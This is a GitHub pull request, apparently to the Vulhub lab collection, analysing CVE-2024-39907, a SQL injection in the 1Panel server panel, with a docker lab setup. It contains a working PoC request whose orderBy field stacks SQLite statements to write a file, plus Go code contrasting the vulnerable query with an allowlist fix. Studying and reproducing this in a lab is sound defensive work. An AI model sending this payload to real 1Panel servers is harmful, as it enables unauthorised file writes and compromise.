Conversation

Contributor

@wjch611 wjch611 commented Jun 18, 2025

CVE-2024-39907: In-Depth Analysis of SQL Injection Vulnerability in 1Panel Control Panel

CVE-2024-39907 is a critical security vulnerability affecting the 1Panel server management control panel, involving multiple SQL injection points that could lead to remote code execution (RCE). Below is a detailed technical analysis of this vulnerability.

Vulnerability Overview

CVE-2024-39907 is a collection of multiple SQL injection vulnerabilities present in the 1Panel control panel. These vulnerabilities exist across several interfaces of 1Panel, where insufficient filtering could allow attackers to achieve arbitrary file writes and ultimately remote code execution (RCE).

1Panel is a web-based Linux server management control panel that provides a graphical interface for server administration. This vulnerability affects 1Panel v1.10.9-lts and earlier versions, and has been patched in v1.10.12-tls.

Reference links:

Vulnerability Environment

Execute the following command to start a vulnerable instance of 1Panel v1.10.10-lts:

docker compose up -d
  • Default port: 10086
  • Default username: 1panel
  • Default password: 1panel_password
  • Default entrance: entrance

Then access http://your-ip:10086/entrance to see the login page and log in using the default credentials.

Vulnerability Reproduction

The vulnerability primarily exists in the API interfaces of 1Panel, particularly the /api/v1/hosts/command/search endpoint. Attackers can trigger SQL injection by carefully crafting request parameters.

A typical proof-of-concept (PoC) request is as follows:

POST /api/v1/hosts/command/search HTTP/1.1
Host: 192.168.8.128:8877
Accept-Language: zh
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Referer: http://192.168.8.128:8877/aaa
Accept-Encoding: gzip, deflate
Cookie: psession=you-session
Connection: close
Content-Length: 83

{
  "page":1,
  "pageSize":10,
  "groupID":0,
  "orderBy":"3;ATTACH DATABASE '/tmp/randstr.txt' AS test;create TABLE test.exp (data text);create TABLE test.exp (data text);drop table test.exp;",
  "order":"ascending",
  "name":"a"
}

This attempts to create a database file to confirm whether the injection is successful.


Limitations and Considerations

  1. Valid session required: As shown by the psession=you-session cookie, the attacker must first obtain valid authentication credentials.
  2. SQLite-specific syntax: This PoC uses SQLite-specific commands, indicating that the 1Panel backend uses SQLite database.
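The PoC above works because the `orderBy` and `order` fields are spliced into an ORDER BY clause as raw text, so a `;` lets the attacker append further SQLite statements (here `ATTACH DATABASE`, which creates a file at an attacker-chosen path). The following Go program is an added example, not 1Panel's code: it reproduces the request shape from the PoC in a hypothetical `SearchRequest` type, shows the vulnerable concatenation beside an allowlist-based replacement, and feeds the PoC payload through both. Column names (`name`, `created_at`, `updated_at`) and the table name `commands` are assumptions chosen for illustration. Identifiers and sort directions cannot be bound as query parameters, which is why the fix maps client keys to fixed SQL fragments instead of escaping them.

```go
package main

import (
	"errors"
	"fmt"
	"strings"
)

// SearchRequest mirrors the JSON body fields used in the PoC request above.
// The struct is an assumption for this example, not 1Panel's actual type.
type SearchRequest struct {
	Page     int    `json:"page"`
	PageSize int    `json:"pageSize"`
	GroupID  int    `json:"groupID"`
	OrderBy  string `json:"orderBy"`
	Order    string `json:"order"`
	Name     string `json:"name"`
}

// unsafeOrderClause shows the vulnerable pattern: the client-controlled
// orderBy/order values are concatenated straight into the SQL text.
// Everything after a ';' in OrderBy reaches SQLite as additional statements
// if the driver executes multi-statement strings.
func unsafeOrderClause(r SearchRequest) string {
	return "SELECT * FROM commands WHERE name LIKE ? ORDER BY " +
		r.OrderBy + " " + r.Order + " LIMIT ? OFFSET ?"
}

// allowedOrderColumns maps the client-facing sort key to a fixed column
// identifier. Only these exact keys are accepted (assumed column set).
var allowedOrderColumns = map[string]string{
	"name":       "name",
	"created_at": "created_at",
	"updated_at": "updated_at",
}

// allowedDirections maps the UI's "ascending"/"descending" words (as seen in
// the PoC body) to SQL keywords.
var allowedDirections = map[string]string{
	"ascending":  "ASC",
	"descending": "DESC",
}

// ErrBadOrder is returned for any orderBy/order value not in the allowlists.
var ErrBadOrder = errors.New("invalid orderBy/order parameter")

// safeOrderClause builds the same query but never copies client input into
// the SQL text: the sort key and direction are looked up in the allowlists,
// and anything else (including the PoC payload) is rejected.
func safeOrderClause(r SearchRequest) (string, error) {
	col, ok := allowedOrderColumns[r.OrderBy]
	if !ok {
		return "", fmt.Errorf("%w: orderBy=%q", ErrBadOrder, r.OrderBy)
	}
	dir, ok := allowedDirections[strings.ToLower(r.Order)]
	if !ok {
		return "", fmt.Errorf("%w: order=%q", ErrBadOrder, r.Order)
	}
	return fmt.Sprintf("SELECT * FROM commands WHERE name LIKE ? ORDER BY %s %s LIMIT ? OFFSET ?", col, dir), nil
}

func main() {
	// The orderBy value is the payload from the PoC request above.
	poc := SearchRequest{
		Page:     1,
		PageSize: 10,
		GroupID:  0,
		OrderBy:  "3;ATTACH DATABASE '/tmp/randstr.txt' AS test;create TABLE test.exp (data text);create TABLE test.exp (data text);drop table test.exp;",
		Order:    "ascending",
		Name:     "a",
	}
	fmt.Println("vulnerable build:")
	fmt.Println("  " + unsafeOrderClause(poc))

	fmt.Println("allowlisted build, PoC payload:")
	if _, err := safeOrderClause(poc); err != nil {
		fmt.Println("  rejected:", err)
	}

	fmt.Println("allowlisted build, legitimate request:")
	q, err := safeOrderClause(SearchRequest{Page: 1, PageSize: 10, OrderBy: "name", Order: "ascending", Name: "a"})
	if err != nil {
		fmt.Println("  unexpected error:", err)
		return
	}
	fmt.Println("  " + q)
}
```

Running it prints the injected query text from `unsafeOrderClause`, the rejection from `safeOrderClause` for the PoC body, and a clean `ORDER BY name ASC` query for a legitimate request. The same allowlist approach applies to any ORM `Order()` call that takes a raw string.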

Contributor Author

wjch611 commented Jun 18, 2025

This is my first contribution to Vulhub. Please let me know if any adjustments are needed.

@phith0n phith0n self-requested a review August 8, 2025 02:32
Member

@phith0n phith0n left a comment


fixed all issues

@phith0n phith0n merged commit cbdca84 into vulhub:master Sep 11, 2025
2 checks passed